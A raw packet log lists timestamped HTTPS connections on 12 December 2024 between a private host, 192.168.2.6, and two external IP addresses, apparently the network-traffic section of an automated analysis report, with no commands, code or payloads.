Dec 12, 2024 13:05:01.949208975 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:01.961282015 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:01.961302042 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.183732986 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.184057951 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:03.189111948 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:03.189141989 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.189502001 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.201520920 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:03.243345022 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.666337013 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.666501999 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.666708946 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:03.666727066 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.666758060 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.666802883 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:03.666822910 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.674138069 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.674209118 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:03.674226999 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.682569981 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.682656050 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:03.682665110 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.699260950 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.699343920 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:03.699357033 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.707787037 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.707869053 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:03.707875967 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.749553919 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:03.861063004 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.864718914 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.864809990 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.864844084 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:03.864869118 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.864921093 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:03.872343063 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.882999897 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.883090973 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.883142948 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:03.883155107 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.883200884 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:03.890845060 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.898299932 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.898402929 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.898420095 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:03.898447037 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:03.898505926 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:04.010744095 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:04.018062115 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:04.018173933 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:04.018203974 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:04.018230915 CET	443	49707	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:04.018281937 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:04.303298950 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:07.926300049 CET	49710	443	192.168.2.6	162.125.65.18
Dec 12, 2024 13:05:07.926347017 CET	443	49710	162.125.65.18	192.168.2.6
Dec 12, 2024 13:05:07.926429033 CET	49710	443	192.168.2.6	162.125.65.18
Dec 12, 2024 13:05:07.931688070 CET	49710	443	192.168.2.6	162.125.65.18
Dec 12, 2024 13:05:07.931708097 CET	443	49710	162.125.65.18	192.168.2.6
Dec 12, 2024 13:05:09.303606033 CET	443	49710	162.125.65.18	192.168.2.6
Dec 12, 2024 13:05:09.303730965 CET	49710	443	192.168.2.6	162.125.65.18
Dec 12, 2024 13:05:09.305892944 CET	49710	443	192.168.2.6	162.125.65.18
Dec 12, 2024 13:05:09.305903912 CET	443	49710	162.125.65.18	192.168.2.6
Dec 12, 2024 13:05:09.306279898 CET	443	49710	162.125.65.18	192.168.2.6
Dec 12, 2024 13:05:09.316975117 CET	49710	443	192.168.2.6	162.125.65.18
Dec 12, 2024 13:05:09.359328985 CET	443	49710	162.125.65.18	192.168.2.6
Dec 12, 2024 13:05:10.488588095 CET	443	49710	162.125.65.18	192.168.2.6
Dec 12, 2024 13:05:10.488656998 CET	443	49710	162.125.65.18	192.168.2.6
Dec 12, 2024 13:05:10.488847971 CET	49710	443	192.168.2.6	162.125.65.18
Dec 12, 2024 13:05:10.488847971 CET	49710	443	192.168.2.6	162.125.65.18
Dec 12, 2024 13:05:10.490684032 CET	49710	443	192.168.2.6	162.125.65.18
Dec 12, 2024 13:05:15.391607046 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:15.391629934 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:15.391740084 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:15.394666910 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:15.394680977 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:16.607362986 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:16.607489109 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:16.609056950 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:16.609066010 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:16.609324932 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:16.615542889 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:16.659344912 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.219935894 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.219995975 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.220066071 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.220072031 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.220087051 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.220129967 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.220135927 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.228415966 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.228492975 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.228498936 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.236929893 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.237015963 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.237024069 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.245536089 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.245614052 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.245623112 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.262417078 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.262471914 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.262480021 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.312012911 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.339958906 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.390094042 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.411993980 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.416619062 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.416713953 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.416718960 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.416745901 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.416790009 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.427114010 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.434011936 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.434045076 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.434066057 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.434082985 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.434125900 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.441735029 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.449529886 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.449584961 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.449646950 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.449675083 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.449717999 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.457117081 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.464895010 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.464967966 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.464978933 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.472451925 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.472510099 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.472517967 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.480581045 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.480653048 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.480684042 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.492176056 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.492209911 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.492290974 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.492358923 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.492429018 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.498199940 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.504270077 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.504314899 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.504370928 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.504398108 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.504447937 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.510281086 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.561992884 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.562019110 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.605967045 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.606048107 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.606081009 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.606144905 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.611579895 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.611591101 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.611639023 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.620733976 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.620744944 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.620806932 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.620841026 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.629483938 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.629547119 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.629558086 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.629602909 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.637510061 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.637521029 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.637582064 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.641619921 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.641628981 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.641681910 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.649233103 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.649243116 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.649306059 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.656855106 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.656909943 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.656919956 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.656964064 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.663278103 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.663360119 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.665927887 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.665986061 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.671166897 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.671231031 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.674005985 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.674118042 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.679153919 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.679220915 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.684334993 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.684407949 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.689611912 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.689678907 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.795748949 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.795834064 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.799598932 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.799655914 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.802227020 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.802283049 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.806667089 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.806734085 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.811074018 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.811129093 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.813414097 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.813471079 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.817687988 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.817755938 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.821631908 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.821696997 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.825822115 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.825879097 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.828046083 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.828094006 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.832636118 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.832693100 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.834273100 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.834346056 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.838398933 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.838449955 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.842572927 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.842624903 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.846642017 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.846694946 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.848798990 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.848851919 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.853100061 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.853152990 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.857084990 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.857136965 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.860243082 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.860291004 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.862593889 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.862643003 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.866549015 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.866600037 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.870553017 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.870608091 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.874795914 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.874847889 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.877039909 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.877100945 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.887432098 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.887442112 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.887485981 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.887507915 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.887546062 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.887559891 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.901798964 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.901855946 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.901859999 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.901880026 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.901911020 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.996916056 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.996952057 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.996999025 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.997033119 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:17.997054100 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:17.997077942 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.008229017 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.008248091 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.008312941 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.008322001 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.008361101 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.017940998 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.017957926 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.018038034 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.018049002 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.018091917 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.029006958 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.029022932 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.029081106 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.029088974 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.029138088 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.039866924 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.039885044 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.039930105 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.039938927 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.039983034 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.040024996 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.050100088 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.050133944 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.050167084 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.050174952 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.050200939 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.050223112 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.060674906 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.060692072 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.060786009 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.060796976 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.060841084 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.179969072 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.179991007 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.180075884 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.180083990 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.180176973 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.187060118 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.187077045 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.187139034 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.187145948 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.187167883 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.187190056 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.194778919 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.194797039 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.194863081 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.194870949 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.194925070 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.202554941 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.202570915 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.202655077 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.202661991 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.202703953 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.209367037 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.209387064 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.209429026 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.209434986 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.209464073 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.209495068 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.217518091 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.217540979 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.217628002 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.217637062 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.218000889 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.224292040 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.224308968 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.224379063 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.224385977 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.224534988 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.231992960 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.232019901 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.232091904 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.232104063 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.232126951 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.232148886 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.371598005 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.371623993 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.371738911 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.371779919 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.371957064 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.379188061 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.379211903 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.379281998 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:18.379291058 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:18.379333973 CET	49726	443	192.168.2.6	172.65.251.78
